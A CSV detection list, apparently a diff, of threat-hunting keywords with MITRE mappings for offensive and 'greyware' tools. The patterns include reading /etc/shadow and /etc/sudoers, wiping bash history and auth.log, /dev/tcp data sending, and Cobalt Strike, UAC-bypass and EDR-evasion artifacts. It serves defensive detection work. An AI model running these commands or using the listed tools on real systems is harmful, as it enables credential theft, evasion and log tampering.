*bash-history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : 
about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z"
+"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*cat /dev/null > /var/log/auth.log*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cat /dev/null > ~/.bash_history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cat /etc/passwd*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - 
Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cat /etc/shadow*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cat /etc/sudoers*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cat > /dev/tcp/127.0.0.1*<*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*catphish.rb*","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. 
Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","583","131","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z"
+"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*CC127443-2519-4E04-8865-A6887658CDE5*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*cc2_keystrokes*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_keystrokes_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_mimipenguin.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*cc2_portscan*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_portscan_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_rebind_*_get_recv*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_rebind_*_get_send*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's 
cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_rebind_*_post_recv*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_rebind_*_post_send*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2_udp_server*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cc2FilesColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*cc2ProcessColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*CCHOST=127.0.0.1*/tmp/c2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*cckuailong/reapoc*","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","629","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z"
+"*CCob/BOF.NET*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z"
+"*cd *.::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*cd ./whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z"
+"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*cd golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*cd katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
+"*cd koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*cd ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*cd PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
